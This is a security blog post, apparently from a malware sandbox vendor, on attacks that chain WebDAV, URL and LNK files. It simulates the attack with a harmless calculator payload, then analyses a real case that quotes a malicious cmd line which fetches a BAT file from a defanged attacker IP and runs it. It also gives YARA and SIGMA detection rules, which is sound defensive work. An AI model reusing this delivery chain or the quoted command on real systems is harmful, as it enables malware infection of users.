Client-Side Exploitation: WebDAV+URL+LNK Abuse

Attackers often place malicious payloads on remote servers, which are then downloaded and executed on the user’s PC using scripts or other methods. One type of server attackers can leverage is WebDAV (Web Distributed Authoring and Versioning) — a file transfer protocol built on top of HTTP.

In this article, we’ll explore how an attack is carried out from the offensive perspective, and then examine how to detect and defend against it defensively.

First, we’ll simulate an attack using a WebDAV server targeting a client PC to understand what it looks like offensively. Then from the defensive side, we’ll analyze a real-world example that loads malware like AsyncRat/Purelogs, discuss detection methods, and write some detection rules.

The offensive view

To simulate the attack, we need two hosts: one running a Linux OS (we’ll use Kali Linux), and the other running Windows (we’ll use the ANY.RUN virtual machine).

First, let’s connect the ANY.RUN Sandbox to the local network (if unsure how, check this article). We’ll use ping command to verify connectivity:

Successful connection to the attacker’s host


Next, we’ll create a shortcut file (LNK) that launches the calculator using the command line:

Properties of the created LNK file 

Since the shortcut needs to be on a remote WebDAV server to auto-download and execute, we’ll upload it using the scp command:

The file was successfully copied to the attacking server.

For added stealth, instead of directly accessing the LNK, we’ll add a proxy stage — a URL pointing to a file containing the link to the attacking WebDAV server hosting the LNK. This URL file is what the victim will run:

URL file linking to the tag 

The last preparation step is to start the WebDAV server. We’ll use the WsgiDAV server for this. Connect to the attacking server via SSH:

Sucesfull SSH connection

Then we can start the WebDAV server on port 3001 using the current working directory:

WebDAV server has started on port 3001 

Everything is ready, now we just need to execute the URL file:

Result of executing the command 

We see the command executed successfully and the calculator launched. Meanwhile, the WebDAV server logs show the connection from the user’s computer:

LNK file download logs from WebDav server

Now we understand what a client-side WebDAV exploit looks like offensively. Let’s examine a real-world example found in our public submissions.

The defensive view

As an example, we will partially analyze this task. In this example, the attack started with a phishing email and ended with AsyncRAT, PureLogs, and other malware being downloaded. The execution chain was:

Visualization of the execution chain 

While there are many IOCs and detection vectors, we’ll focus on those directly relating to WebDAV exploitation:

  1. The URL file linking to the malicious LNK
  1. The LNK file containing malicious commands
  1. The network connection to the attacking server

Like our simulation, the actual attack used a URL file delivered in a zipped Dropbox download. This URL contained a link to the malicious LNK file:

Contents of the URL of the file the user is executing viewed in ANY.RUN sandbox 


Interestingly, the file points to the TryCloudFlare phishing domain, and the port is specified as SSL instead of a number. We also see the link contains the WebDAV directory name DavWWWRoot and the .lnk extension.

To detect such a malicious URL file, we can create a YARA rule:

rule url_file 
{  
    meta:  
        author = "ANY.RUN"  
        description = "Rule identifying shortcut (LNK) with cmd command copy and start bat"  
    strings:  
        $url_lnk = { 5B 49 6E 74 65 72 6E 65 74 53 68 6F 72 74 63 75 74 5D }  //[InternetShortcut]  
        $url_file = "URL=file://" ascii 
    condition:  
        $url_lnk at 0 and $url_file  
} 

When the user launches the malicious URL file, an LNK file with a randomly generated GUID name is saved to the temporary Tfs_DAV directory.

Examining the created LNK, we see it contains a CMD command to copy a BAT file from the WebDAV server directory to %USERPROFILE%Pictures on the user’s PC, and then execute it:

C:WindowsSystem32cmd.exe /c copy “101.99[.]94.234@9809DavWWWRootfile.bat” “%USERPROFILE%Picturesfile.bat” && “%USERPROFILE%Picturesfile.bat”

Since the malicious LNK is created on disk, we can write a YARA hunting rule to detect it:

rule lnk_file  
{   
    meta:   
        author = "ANY.RUN"   
        description = "Rule identifying shortcut (LNK) with WebDAV"   
    strings:   
        $lnk = { 4C 00 00 00 01 14 02 00 }   
        $webdav = /\[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}@d{2,4}/ wide 
    condition:   
        $lnk at 0 and $webdav   
} 

We also see that when the malicious LNK is executed, a specific command line is used that points to the remote server. We can detect this pattern using a SIGMA rule:

title: WebDav in cmdline  
status: test  
description: Detects WebDav in cmdline   
references: https://app.any.run/tasks/86851211-8c9c-4e23-af71-b62d6cbfe14c/  
author: ANY.RUN  
date: 2024/04/21  
tags: attack.t1071.001  
logsource:  
    category: process_creation  
    product: windows  
detection:  
    selection_target:  
        CommandLine||re: "\.+@.+"  
    selection_image:  
        Image|endswith:  
        -'cmd.exe' 
        -'powershell.exe' 
    condition: selection_target and selection_image 
falsepositives:   
    unknown  
level: medium 

As a result, the payload is downloaded from the remote server, creating network connection artifacts that we can detect.

Having the network connection allows us to add another Suricata rule for detection:

To match the WebDAV link itself, we can use this regular expression in a tool like CyberChef:

So, in summary, we’ve written YARA, Suricata, and SIGMA hunting rules to detect this type of WebDAV exploitation attack.

How to block URL execution

While we’ve learned how to detect these attacks, it’s also important as defenders to prevent them. One mitigation is to block the execution of URL files in Windows settings:

Materials to use for further research

Searching for and studying this attack vector can be done using our threat intelligence service and the detected artifacts. For example, using a regex on the command line:

CommandLine:"\*@*" 

The URL filter can also find relevant results:

URL:"*.lnk$" 

Finally, you can search for triggered Suricata rules:

SuricataMessage:"ET INFO LNK File Downloaded via HTTP" 

We’ve prepared some example results for further analysis:

Conclusions

In this article, we looked at client-side exploitation techniques abusing WebDAV and LNK files to deliver malware. We wrote rules to detect malicious URL/LNK files, command line indicators, and network connections to WebDAV servers. Preventing LNK/URL execution through Windows settings is also an effective control.

About ANY.RUN

ANY.RUN’s flagship product is an interactive malware sandbox that helps security teams efficiently analyze malware.

Every day, a community of 400,000 analysts and 3000 corporate clients use our cloud-based platform to analyze Windows and Linux threats.

Source: Original Post